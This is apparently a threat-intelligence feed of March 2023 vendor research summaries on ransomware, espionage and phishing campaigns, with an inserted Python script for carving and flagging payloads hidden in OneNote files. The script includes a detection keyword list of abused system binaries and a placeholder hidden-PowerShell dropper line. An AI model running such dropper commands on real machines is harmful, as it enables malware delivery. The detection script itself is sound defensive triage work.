- The_Popularity_of_ProxyNotShell_Continues_to_Grow
- Date of Scan:
- 2023-03-18
- Impact:
- LOW
- Summary:
- Researchers from Sophos have observed that the ProxyNotShell vulnerability continues to make waves, as the November 2022 fixes fail to contain the SSRF tactic.
Source:
https://news.sophos.com/en-us/2023/03/15/observing-owassrf-exchange-exploitation-still/
—
- Intel Source:
- Talos
- Intel Name:
- Hackers_From_YoroTrooper_Group_Targeting_CIS_Energy_Orgs_and_EU_Embassies
- Date of Scan:
- 2023-03-17
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers have identified that a new threat actor named ‘YoroTrooper’ has been running cyber-espionage campaigns since at least June 2022, targeting government and energy organizations in Commonwealth of Independent States (CIS) countries.
Source:
https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Exploiting_SVB_Collapse_Scenario
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- Cyble researchers have identified several suspicious websites that have emerged in the wake of the Silicon Valley Bank (SVB) collapse.
Source:
https://blog.cyble.com/2023/03/14/svb-collapse-triggers-heightened-cybersecurity-concerns/
—
- Intel Source:
- Blackberry
- Intel Name:
- Russian_Threat_Group_NOBELIUM_Targeting_Western_Countries
- Date of Scan:
- 2023-03-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Blackberry have observed a new campaign targeting European Union countries, specifically, its diplomatic entities and systems transmitting sensitive information about the region’s politics, aiding Ukrainian citizens fleeing the country, and providing help to the government of Ukraine.
Source:
https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine
—
- Intel Source:
- Google Blog
- Intel Name:
- Microsoft_SmartScreen_Bypassed_by_Magniber_Ransomware_Actors
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- Researchers from Google threat analysis group have discovered the usage of an unpatched security bypass in Microsoft’s SmartScreen security feature, which financially motivated actors are using to deliver the Magniber ransomware without any security warnings. The attackers are delivering MSI files signed with an invalid but specially crafted Authenticode signature.
—
- Intel Source:
- ASEC
- Intel Name:
- Mallox_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the distribution of the Mallox ransomware which targets vulnerable MS-SQL servers.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Examination_of_FG_IR_22_369
- Date of Scan:
- 2023-03-16
- Impact:
- HIGH
- Summary:
- FortiGate researchers have identified that government entities and large organizations are being targeted by an unknown threat actor exploiting a security flaw in Fortinet FortiOS software, resulting in data loss and OS and file corruption.
Source:
https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis
—
- Intel Source:
- Sentinelone
- Intel Name:
- Diving_Deep_into_CatB_Ransomware
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- SentinelOne researchers have analyzed the CatB ransomware and its abuse of the legitimate MSDTC service, describing its evasion tactics, encryption behavior, and its attempts to steal credentials and browser data.
Source:
https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/
—
- Intel Source:
- CISA
- Intel Name:
- Telerik_Vulnerability_in_US_Government_IIS_Server
- Date of Scan:
- 2023-03-16
- Impact:
- MEDIUM
- Summary:
- CISA, the FBI, and MS-ISAC have released a joint Cybersecurity Advisory (CSA) that provides IT infrastructure defenders with TTPs, IOCs, and detection and protection methods against exploitation of CVE-2019-18935 similar to the successful intrusion it describes.
—
- Intel Source:
- Cyble
- Intel Name:
- The_MedusaLocker_Ransomware_is_Revealed
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- Researchers from Cyble have unmasked the MedusaLocker ransomware. It is known to target the hospital and healthcare industries, but the gang also targets education and government organizations.
Source:
https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- APT_Group_Tick_Targeting_Data_Loss_Prevention_Company
- Date of Scan:
- 2023-03-16
- Impact:
- MEDIUM
- Summary:
- ESET researchers have discovered a campaign by the APT group Tick. The attackers compromised the DLP company’s internal update servers to deliver malware inside the software developer’s network and trojanized installers of legitimate tools used by the company, which eventually resulted in the execution of malware on the computers of the company’s customers.
—
- Intel Source:
- Microsoft
- Intel Name:
- Large_Scale_Phishing_Campaigns_are_Powered_by_DEV_1101_AiTM_Phishing_Kit
- Date of Scan:
- 2023-03-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Microsoft have identified an open-source adversary-in-the-middle (AiTM) phishing kit that has found a number of takers in the cybercrime world for its ability to orchestrate attacks at scale. Microsoft is tracking the threat actor behind the development of the kit under the emerging moniker DEV-1101.
—
- Intel Source:
- Juniper
- Intel Name:
- A_Look_at_Dark_Side_of_Email_Traffic
- Date of Scan:
- 2023-03-16
- Impact:
- LOW
- Summary:
- Researchers from Juniper have analyzed the dark side of email traffic, uncovering some of the latest malware threats, tactics, and trends that can potentially undermine systems.
Source:
https://blogs.juniper.net/en-us/threat-research/uncovering-the-dark-side-of-email-traffic
—
- Intel Source:
- ASEC
- Intel Name:
- A_CHM_malware_by_the_Kimsuky_group
- Date of Scan:
- 2023-03-15
- Impact:
- LOW
- Summary:
- ASEC has discovered a new CHM malware created by the Kimsuky group. It is the same malware type that the researchers mentioned earlier in their posts on malware distributed by the Kimsuky group, its goal being the exfiltration of user information.
—
- Intel Source:
- Mandiant
- Intel Name:
- North_Korea_s_UNC2970_TTPs_Part_1_and_2
- Date of Scan:
- 2023-03-15
- Impact:
- MEDIUM
- Summary:
- During their investigation, Mandiant researchers discovered most of the originally compromised hosts targeted by UNC2970. Mandiant Managed Defense also discovered that this group is targeting a U.S.-based technology company.
Source:
https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970
https://www.mandiant.com/resources/blog/lightshift-and-lightshow
—
- Intel Source:
- Netskope
- Intel Name:
- Increasingly_Abusing_of_DigitalOcean_by_attackers
- Date of Scan:
- 2023-03-15
- Impact:
- LOW
- Summary:
- Netskope Threat Labs has observed increased traffic to malicious web pages hosted on DigitalOcean over the last couple of months. This new scam campaign mimics Windows Defender and tries to deceive users into believing that their computer is infected. The purpose of the scam is to lure victims into calling a fraudulent “help line”. The attackers then try to gain remote access to the victim’s computer to either install malware or request payment.
Source:
https://www.netskope.com/blog/attackers-increasingly-abusing-digitalocean-to-host-scams-and-phishing
—
- Intel Source:
- MetaBase Q
- Intel Name:
- The_new_ATM_Malware_FiXS
- Date of Scan:
- 2023-03-14
- Impact:
- LOW
- Summary:
- FiXS is a new malware family that infects ATMs and steals data from them. Metabase Q has been tracking and monitoring the rise of ATM malware that takes advantage of both the physical and digital components of ATMs.
—
- Intel Source:
- Cofense
- Intel Name:
- Emotet_resumes_sending_malicious_emails
- Date of Scan:
- 2023-03-14
- Impact:
- LOW
- Summary:
- Researchers from Cofense have discovered that, after several months of inactivity, the Emotet botnet resumed email activity this morning at 8:00am EST. The malicious emails appear to reply to existing email chains and carry an attached .zip file that is not password protected. The themes of the attached files include finances and invoices.
Source:
https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/
—
- Intel Source:
- Talos
- Intel Name:
- New_capabilities_of_Prometei_botnet
- Date of Scan:
- 2023-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from Talos have observed Prometei with updated infrastructure components and capabilities. The botnet operators updated certain submodules of the execution chain to automate processes and complicate forensic analysis. The threat actors are actively spreading an improved Linux version of the Prometei bot, v3. Researchers have also observed new functionality, including an additional C2 domain generation algorithm (DGA), a self-updating mechanism, and a bundled version of the Apache web server with a web shell. The bot’s targeting is possibly influenced by the war in Ukraine.
Source:
https://blog.talosintelligence.com/prometei-botnet-improves/
—
- Intel Source:
- PaloAlto
- Intel Name:
- New_GoBruteforcer_Malware_Targeting_phpMyAdmin_MySQL_FTP_and_Postgres
- Date of Scan:
- 2023-03-13
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have identified a newly discovered Golang-based botnet malware that scans for and infects web servers running phpMyAdmin, MySQL, FTP, and Postgres services.
Source:
https://unit42.paloaltonetworks.com/gobruteforcer-golang-botnet/?web_view=true
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Hacker_Running_Malware_on_Unpatched_SMA
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified a suspected Chinese campaign that maintains long-term persistence by running malware on an unpatched SonicWall Secure Mobile Access (SMA) appliance. The malware has the functionality to steal user credentials, provide shell access, and persist through firmware upgrades. Mandiant currently tracks this actor as UNC4540.
Source:
https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Overview_of_a_Mirai_Payload_Generator
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed that their honeypot is still hit by hundreds of Mirai requests every day. Upon analysis, they found a Python script that generates a Mirai payload and starts network services to serve it via FTP, HTTP, and TFTP.
Source:
https://isc.sans.edu/diary/Overview+of+a+Mirai+Payload+Generator/29624/
—
- Intel Source:
- ASEC
- Intel Name:
- Netcat_Malware_Targeting_MS_SQL_Servers
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of the Netcat malware targeting poorly managed MS-SQL servers. Netcat is a utility that allows users to send and receive data to and from specific destinations on a network over TCP or UDP.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- AsynRAT_Trojan_Distributing_via_Bill_Payment_Email
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed that their mail server quarantined the file FautraPago392023.gz. After decompressing it with gunzip, the extracted file carried no .exe extension. The source and destination addresses of the email were both blank, without an actual email address.
Source:
https://isc.sans.edu/diary/AsynRAT+Trojan+Bill+Payment+Pago+de+la+factura/29626/
—
- Intel Source:
- Cofense
- Intel Name:
- New_Phishing_Scam_Using_Fake_SBA_Grants
- Date of Scan:
- 2023-03-13
- Impact:
- LOW
- Summary:
- Researchers from Cofense have observed a phishing campaign impersonating the US Small Business Administration (SBA) and offering grants in the hope that an unfortunate recipient will provide their credentials.
Source:
https://cofense.com/blog/fake-small-business-administration-sba-grant-used-in-new-phishing-scam/
—
- Intel Source:
- Esentire
- Intel Name:
- BATLOADER_Malware_Leveraging_Google_Ads
- Date of Scan:
- 2023-03-13
- Impact:
- MEDIUM
- Summary:
- eSentire researchers have discovered that the malware downloader known as BATLOADER is abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. The malicious ads spoof a wide range of legitimate apps and services such as Adobe, OpenAI’s ChatGPT, Spotify, Tableau, and Zoom.
—
- Intel Source:
- Cyble
- Intel Name:
- Chaos_Ransomware_Shadow_is_Cast_by_BlackSnake_Ransomware
- Date of Scan:
- 2023-03-11
- Impact:
- LOW
- Summary:
- Cyble Labs researchers have discovered a ransomware variant that not only encrypts victims’ files but also steals their Discord tokens.
Source:
https://blog.cyble.com/2023/03/09/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/
—
- Intel Source:
- ASEC
- Intel Name:
- PlugX_Malware_Exploits_Remote_Desktop_Software_Flaws
- Date of Scan:
- 2023-03-11
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have discovered that security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware.
—
- Intel Source:
- Securelist
- Intel Name:
- The_Use_of_Search_Engines_For_Malvertising
- Date of Scan:
- 2023-03-10
- Impact:
- LOW
- Summary:
- Researchers from Securelist have observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware. At least two different stealers, Rhadamanthys and RedLine, are abusing the search engine promotion plan in order to deliver malicious payloads to victims’ machines.
Source:
https://securelist.com/malvertising-through-search-engines/108996/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_ScrubCrypt_Crypter_Targeting_Oracle_WebLogic
- Date of Scan:
- 2023-03-10
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have observed that the attack chain commences with the successful exploitation of vulnerable Oracle WebLogic servers to download a PowerShell script that contains ScrubCrypt.
Source:
https://www.fortinet.com/blog/threat-research/old-cyber-gang-uses-new-crypter-scrubcrypt
—
- Intel Source:
- Sentinelone
- Intel Name:
- IceFire_Ransomware_Exploiting_IBM_Aspera_Faspex
- Date of Scan:
- 2023-03-10
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have identified that a Windows-based ransomware strain known as IceFire has expanded its focus to target Linux enterprise networks belonging to several media and entertainment sector organizations across the world.
Source:
https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/
—
- Intel Source:
- Trustwave
- Intel Name:
- OneNote_Misused_by_Cybercriminals
- Date of Scan:
- 2023-03-09
- Impact:
- LOW
- Summary:
- Researchers from Trustwave have analyzed the activity of cybercriminals as to how they are abusing OneNote.
—
- Intel Source:
- Cofense
- Intel Name:
- Increasing_Phishing_Campaigns_During_Tax_Season
- Date of Scan:
- 2023-03-09
- Impact:
- LOW
- Summary:
- Researchers from Cofense have identified threat actors attempting to use tax season to target recipients with a potential refund, using the Adobe file-sharing service to deliver the phishing page.
Source:
https://cofense.com/blog/tax-season-phishing-campaigns-are-ramping-up/
—
- Intel Source:
- ZScaler
- Intel Name:
- Analysis_of_Nevada_Ransomware_and_Compares_With_Nokoyawa_Ransomware
- Date of Scan:
- 2023-03-09
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz has identified significant code similarities between the Nevada and Nokoyawa ransomware families, including debug strings, command-line arguments, and encryption algorithms.
Source:
https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokayawa-variant
—
- Intel Source:
- Volexity
- Intel Name:
- Analysis_of_Memory_For_Detecting_EDR_Nullifying_Malware
- Date of Scan:
- 2023-03-09
- Impact:
- LOW
- Summary:
- Volexity researchers have examined whether the technique of attacking endpoint detection and response (EDR) and antivirus (AV) software can be reliably detected through memory analysis.
Source:
https://www.volexity.com/blog/2023/03/07/using-memory-analysis-to-detect-edr-nullifying-malware/
—
- Intel Source:
- Trellix
- Intel Name:
- Qakbot_evolves_to_OneNote_Malware_Distribution
- Date of Scan:
- 2023-03-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Trellix have observed that Qakbot (aka QBot, QuakBot, and Pinkslipbot), a sophisticated piece of malware, has seen an upsurge in campaigns using a novel delivery technique: OneNote documents for malware distribution.
—
- Intel Source:
- ASEC
- Intel Name:
- GlobeImposter_Ransomware_Installed_Using_RDP
- Date of Scan:
- 2023-03-08
- Impact:
- LOW
- Summary:
- ASEC has recently discovered the active distribution of the GlobeImposter ransomware. This attack is being carried out by the threat actors behind MedusaLocker.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Chinese_Cyber_Attack_Against_Southeast_Asian_Government_Entities
- Date of Scan:
- 2023-03-08
- Impact:
- HIGH
- Summary:
- Researchers from Checkpoint have analyzed the TTPs and the tools used in the espionage campaign against Southeast Asian government entities. The initial infection stages of this campaign use TTPs and tools consistent with Sharp Panda activity.
—
- Intel Source:
- Cyware
- Intel Name:
- PyPI_package_delivers_malicious_Colour_Blind_RAT
- Date of Scan:
- 2023-03-08
- Impact:
- LOW
- Summary:
- Researchers from Cyware have identified a malicious PyPI package that delivers a fully featured information stealer and remote access trojan dubbed Colour-Blind.
Source:
https://cyware.com/news/malicious-pypi-package-delivers-colour-blind-rat-1c24f4e6/?web_view=true
—
- Intel Source:
- Fortinet
- Intel Name:
- In_Depth_Analysis_of_Sirattacker_and_ALC_Ransomware
- Date of Scan:
- 2023-03-08
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have gathered data on ransomware variants of interest that have been gaining traction within their datasets and the OSINT community. They analyzed the Sirattacker and ALC ransomware, which target Microsoft Windows users.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-sirattacker-acl?&web_view=true
—
- Intel Source:
- Bitdefender
- Intel Name:
- Phishing_Campaign_Using_Copycat_ChatGPT_Platform
- Date of Scan:
- 2023-03-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Bitdefender Labs have identified that the success of the viral AI tool has also attracted the attention of fraudsters, who use the technology to conduct highly sophisticated investment scams against unwary internet users.
—
- Intel Source:
- PRODAFT
- Intel Name:
- In_Depth_Analysis_of_RIG_Exploit_Kit
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- Researchers from Prodaft have analyzed the RIG Exploit Kit. It is operated under a malware-as-a-service (MaaS) subscription model and is enjoying the most successful period of its lifetime in terms of successful attacks.
Source:
https://www.prodaft.com/resource/detail/rig-rig-exploit-kit-depth-analysis
—
- Intel Source:
- PaloAlto
- Intel Name:
- LokiBot_Distributing_via_Phishing_Emails
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- PaloAlto researchers have uncovered a malware distribution campaign that is delivering the LokiBot information stealer via business email compromise (BEC) phishing emails. This malware is designed to steal sensitive information from victims’ systems, such as passwords and banking information, as well as other sensitive data.
Source:
https://unit42.paloaltonetworks.com/lokibot-spike-analysis/
—
- Intel Source:
- Lumen
- Intel Name:
- New_HiatusRAT_Malware_Targeting_Business_Grade_Routers
- Date of Scan:
- 2023-03-07
- Impact:
- MEDIUM
- Summary:
- Lumen researchers have observed malware that is targeting business-grade routers to covertly spy on victims in Latin America, Europe, and North America at least since July 2022.
Source:
https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/
—
- Intel Source:
- ASEC
- Intel Name:
- The_Analysis_of_Lazarus_Group
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- ASEC researchers have identified Lazarus group malware strains in various Korean companies related to national defense, satellites, software, media, etc. Hence, they tracked and analyzed the Lazarus threat group’s activities and related malware.
—
- Intel Source:
- Trellix
- Intel Name:
- Phishing_Campaign_Targeting_Job_Seekers_and_Employers
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- Researchers from Trellix have discovered threat actors exploiting the ongoing economic downturn by using job-themed phishing and malware campaigns to target job seekers and employers, steal sensitive information, and compromise company recruiters.
—
- Intel Source:
- Nviso
- Intel Name:
- OneNote_Embedded_File_Abuse
- Date of Scan:
- 2023-03-07
- Impact:
- LOW
- Summary:
- Researchers from Nviso have observed that the OneNote feature abused in these phishing campaigns is the ability to hide embedded files behind a picture that entices the user to click it. If the picture is clicked, the file hidden beneath it is executed.
Source:
https://blog.nviso.eu/2023/02/27/onenote-embedded-file-abuse/
—
- Intel Source:
- Sysdig
- Intel Name:
- Hackers_From_SCARLETEEL_Using_Advanced_Cloud_Skills_to_Steal_Source_Code_and_Data
- Date of Scan:
- 2023-03-06
- Impact:
- MEDIUM
- Summary:
- Sysdig researchers have discovered a sophisticated cloud operation in a customer environment, dubbed SCARLETEEL, that resulted in stolen proprietary data. The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials.
Source:
https://sysdig.com/blog/cloud-breach-terraform-data-theft/
—
- Intel Source:
- Cyble
- Intel Name:
- LockBit_Ransomware_Attack_on_Indian_Companies
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Cyble researchers have observed the LockBit ransomware group that claimed to have compromised the networks of an Indian investment company, Infrastructure Leasing & Financial Services Limited (IL&FS), on February 28, 2023.
Source:
https://blog.cyble.com/2023/03/01/ransomware-attack-on-ilfs/
—
- Intel Source:
- CISA
- Intel Name:
- The_New_TTPs_of_Royal_ransomware
- Date of Scan:
- 2023-03-06
- Impact:
- MEDIUM
- Summary:
- The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released the joint CSA to disseminate known Royal ransomware IOCs and TTPs identified through FBI threat response activities as recently as January 2023.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
—
- Intel Source:
- TrendMicro
- Intel Name:
- Spear_Phishing_Campaign_Targeting_Hospitality_Industry_Using_RedLine_Stealer
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have identified an evasive RedLine Stealer spear-phishing campaign targeting the hospitality industry.
—
- Intel Source:
- Cyble
- Intel Name:
- WhiteSnake_Stealer_Targeting_Windows_and_Linux_Users
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new malware strain called “WhiteSnake” Stealer. This stealer is available in versions designed for both Windows and Linux. It is capable of gathering a range of sensitive information, including passwords, cookies, credit card numbers, screenshots, and other personal or financial data.
Source:
https://blog.cyble.com/2023/02/24/new-whitesnake-stealer-offered-for-sale-via-maas-model/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- RIG_Exploit_Kit_Targeting_Internet_Explorer_Users
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have identified that Internet Explorer (IE) is still being exploited by exploit kits like the RIG exploit kit (EK).
—
- Intel Source:
- Fortinet
- Intel Name:
- MyDoom_Worm_Distributing_via_Phishing_Email
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have identified a phishing campaign using the MyDoom worm. It was first discovered back in 2004 and it has seen some updates and modifications since its introduction.
—
- Intel Source:
- ZScaler
- Intel Name:
- OneNote_Documents_Distributing_Malware
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Zscaler researchers have observed threat actors are increasingly using Microsoft OneNote documents to deliver malware via phishing emails.
Source:
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Hackers_From_China_Using_Custom_Backdoor_to_Evade_Detection
- Date of Scan:
- 2023-03-06
- Impact:
- LOW
- Summary:
- Researchers from Welivesecurity have identified the Chinese cyber espionage hacking group Mustang Panda is deploying a new custom backdoor named ‘MQsTTang’ in attacks starting this year.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Deep_Investigation_of_LockBit_Ransomware_Campaign
- Date of Scan:
- 2023-03-04
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have observed a new LockBit ransomware campaign last December and January using a combination of techniques effective against AV and EDR solutions and analyzed the infection chain and Tactics, Techniques, and Procedures (TTPs) of this campaign.
Source:
https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign?&web_view=true
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Examination_of_EXFILTRATION_22
- Date of Scan:
- 2023-03-04
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have provided an analysis of a new post-exploitation framework called EXFILTRATOR-22, a.k.a. EX-22.
Source:
https://www.cyfirma.com/outofband/exfiltrator-22-an-emerging-post-exploitation-framework/
—
- Intel Source:
- Talos
- Intel Name:
- The_deployment_of_New_MortalKombat_Ransomware_and_Laplas_Clipper_Malware_threats
- Date of Scan:
- 2023-03-04
- Impact:
- MEDIUM
- Summary:
- Since last December, the Cisco Talos team has been observing a new actor using two new threats, MortalKombat ransomware and a Go variant of the Laplas Clipper malware, to steal cryptocurrency from victims. Talos researchers have also seen the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389, using one of their download servers, which runs an RDP crawler and also hosts the MortalKombat ransomware. After analyzing commonalities in the code, class names, and registry key strings, the researchers assess that MortalKombat ransomware belongs to the Xorist family.
Source:
https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- BlackLotus_Malware_Capable_of_Bypassing_Secure_Boot
- Date of Scan:
- 2023-03-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Welivesecurity have identified that a stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first UEFI bootkit malware known to bypass Secure Boot on Windows 11.
Source:
https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/
—
- Intel Source:
- Blackberry
- Intel Name:
- Hackers_From_Blind_Eagle_Targeting_Organizations_in_Colombia_and_Ecuador
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- BlackBerry researchers have identified a new campaign where the threat actor impersonated a Colombian government tax agency to target key industries in Colombia, including health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in the country.
Source:
https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia
—
- Intel Source:
- TrendMicro
- Intel Name:
- Iron_Tiger_Group_Targeting_Linux_Through_SysUpdate
- Date of Scan:
- 2023-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have identified that hackers from Iron Tiger updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform.
Source:
https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
—
- Intel Source:
- Proofpoint
- Intel Name:
- Diving_Deep_into_TA569_and_its_SocGholish_Payload
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have observed changes in the tactics, techniques, and procedures (TTPs) employed by TA569. Changes include an increase in the number of injection varieties, as well as payloads deviating from the standard SocGholish “Fake Update” JavaScript packages.
Source:
https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond
—
- Intel Source:
- Inquest
- Intel Name:
- Threat_Actors_Using_Microsoft_OneNote_for_Malicious_Campaigns
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Researchers from Inquest have observed that OneNote has featured in the delivery chains of a number of malware threats and is being used by multiple groups for distribution.
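The OneNote abuse described in the Nviso, Trustwave, Trellix, Zscaler and Inquest entries above all comes down to one structure: every file embedded in a .one section is stored as a FileDataStoreObject, whose FileData is bracketed by a fixed header GUID and footer GUID from the MS-ONE file format. The script below is an added example, not code from any of those vendors; it carves every embedded file out of a section by scanning for those GUIDs and flags PE, LNK and script payloads, which have no business sitting behind a "double-click to view" image. The section it builds when run without arguments is constructed here for illustration (the dropper text is a placeholder, not a real sample), and the keyword list used to recognise scripts is an assumption of this example.

```python
"""Carve the files embedded in a OneNote section (.one) and flag executable
or script payloads hidden behind a lure image."""
from __future__ import annotations

import struct
import uuid

# FileDataStoreObject delimiters from the MS-ONE file format: every file
# embedded in a section is wrapped in these two GUIDs (stored little-endian).
FDSO_HEADER = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
FDSO_FOOTER = uuid.UUID("{71FBA722-0F79-4A0B-BB13-899256426B24}").bytes_le
# guidHeader(16) + cbLength(8) + unused(4) + reserved(8) precede FileData
FDSO_DATA_OFFSET = 16 + 8 + 4 + 8

# Living-off-the-land binaries that dropped scripts typically invoke
# (heuristic list chosen for this example).
SCRIPT_HINTS = (b"powershell", b"cmd.exe", b"wscript", b"cscript", b"mshta",
                b"rundll32", b"regsvr32", b"certutil", b"@echo")


def classify(payload: bytes) -> str:
    """Cheap content-based typing of a carved payload."""
    if payload[:2] == b"MZ":
        return "pe"
    if payload[:4] == b"\x4c\x00\x00\x00":
        return "lnk"
    if payload[:8] == b"\x89PNG\r\n\x1a\n" or payload[:3] == b"\xff\xd8\xff":
        return "image"
    if payload[:4] == b"%PDF":
        return "pdf"
    if any(hint in payload[:4096].lower() for hint in SCRIPT_HINTS):
        return "script"
    return "other"


def carve_embedded_files(data: bytes) -> list[dict]:
    """Return every FileDataStoreObject found in the raw bytes of a .one file."""
    found = []
    pos = data.find(FDSO_HEADER)
    while pos != -1:
        (length,) = struct.unpack_from("<Q", data, pos + 16)  # cbLength
        start = pos + FDSO_DATA_OFFSET
        end = start + length
        payload = data[start:end]
        # The footer GUID follows FileData after at most a few padding bytes;
        # a missing footer means a truncated or tampered object.
        footer_ok = data.find(FDSO_FOOTER, end, end + 24) != -1
        found.append({"offset": start, "size": length, "kind": classify(payload),
                      "footer_ok": footer_ok, "data": payload})
        pos = data.find(FDSO_HEADER, end)
    return found


def suspicious_kinds(objects: list[dict]) -> list[str]:
    """Payload kinds that should never be hidden behind a clickable picture."""
    return [o["kind"] for o in objects if o["kind"] in ("pe", "lnk", "script")]


def build_fdso(payload: bytes) -> bytes:
    """Wrap bytes the way OneNote stores an embedded file (used for the sample)."""
    return FDSO_HEADER + struct.pack("<QIQ", len(payload), 0, 0) + payload + FDSO_FOOTER


# Constructed placeholder dropper, not taken from any real campaign.
SAMPLE_DROPPER = b'@echo off\r\nstart /min powershell -w hidden -c "..."\r\n'


def build_sample_section() -> bytes:
    """Constructed stand-in for a malicious .one file: filler bytes, a lure
    image, then a batch dropper hidden behind it."""
    lure_image = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    return (b"\x00" * 128 + build_fdso(lure_image) + b"\xab" * 32
            + build_fdso(SAMPLE_DROPPER) + b"\x00" * 16)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_section()
    objs = carve_embedded_files(blob)
    for o in objs:
        print(f"offset={o['offset']:#x} size={o['size']} kind={o['kind']} footer_ok={o['footer_ok']}")
    print("verdict:", "SUSPICIOUS" if suspicious_kinds(objs) else "no executable payloads")
```

Run it against a quarantined .one attachment (`python onenote_carve.py sample.one`) to list what the document would execute on click; the carved `data` can be written out for sandboxing. Scanning for the raw GUIDs rather than walking the full object tree means the check also works on damaged or deliberately malformed files, which is why it is a good first triage step.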
—
- Intel Source:
- ISC.SANS
- Intel Name:
- BB17_Distribution_Qakbot_Activity
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified an infection from a URL found on VirusTotal after pivoting on a search for BB17-tagged distribution URLs for Qakbot.
—
- Intel Source:
- ZScaler
- Intel Name:
- Snip3_Crypter_is_Back_With_New_TTPs
- Date of Scan:
- 2023-03-01
- Impact:
- LOW
- Summary:
